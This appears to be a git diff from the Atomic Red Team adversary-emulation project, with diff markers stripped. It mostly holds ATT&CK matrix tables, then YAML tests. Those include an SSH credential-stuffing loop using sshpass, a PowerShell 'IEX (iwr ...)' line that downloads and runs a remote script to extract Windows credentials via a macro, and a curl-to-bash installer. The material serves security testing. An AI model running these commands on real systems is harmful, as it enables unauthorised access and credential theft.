| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | [Software Deployment Tools](../../T1072/T1072.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Screen Capture](../../T1113/T1113.md) | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | [Systemd Timers](../../T1053.006/T1053.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
@@ -43,7 +43,7 @@
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | | |
| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | | | | | | |
| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | | |
| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launch Daemon](../../T1543.004/T1543.004.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
@@ -76,10 +76,10 @@
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | [RC Scripts](../../T1037.004/T1037.004.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | |
| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | | |
| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
+4 -4
View File
@@ -5,7 +5,7 @@
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -15,12 +15,12 @@
| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Keylogging](../../T1056.001/T1056.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Software Deployment Tools](../../T1072/T1072.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Visual Basic](../../T1059.005/T1059.005.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
@@ -57,7 +57,7 @@
| | | [Port Monitors](../../T1547.010/T1547.010.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+803 -120
@@ -831,7 +831,72 @@ credential-access:
x_mitre_contributors:
- Diogo Fernandes
- Anastasios Pingios
atomic_tests: []
identifier: T1110.004
atomic_tests:
- name: SSH Credential Stuffing From Linux
auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad
description: 'Using username,password combination from a password dump to login
over SSH.
'
supported_platforms:
- linux
input_arguments:
target_host:
description: IP Address / Hostname you want to target.
type: String
default: localhost
dependency_executor_name: bash
dependencies:
- description: 'Requires SSHPASS
'
prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] ||
[ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo
apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
'
executor:
name: bash
elevation_required: false
command: |
cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
- name: SSH Credential Stuffing From MacOS
auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
description: 'Using username,password combination from a password dump to login
over SSH.
'
supported_platforms:
- macos
input_arguments:
target_host:
description: IP Address / Hostname you want to target.
type: String
default: localhost
dependency_executor_name: bash
dependencies:
- description: 'Requires SSHPASS
'
prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
1; fi;
'
get_prereq_command: |
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
brew install hudochenkov/sshpass/sshpass
executor:
name: bash
elevation_required: false
command: |
cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
T1552.001:
technique:
id: attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc
@@ -1048,13 +1113,40 @@ credential-access:
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction
Ignore
'
name: powershell
- name: Dump credentials from Windows Credential Manager With PowerShell [windows
Credentials]
auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3
description: This module will extract the credentials from Windows Credential
Manager
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
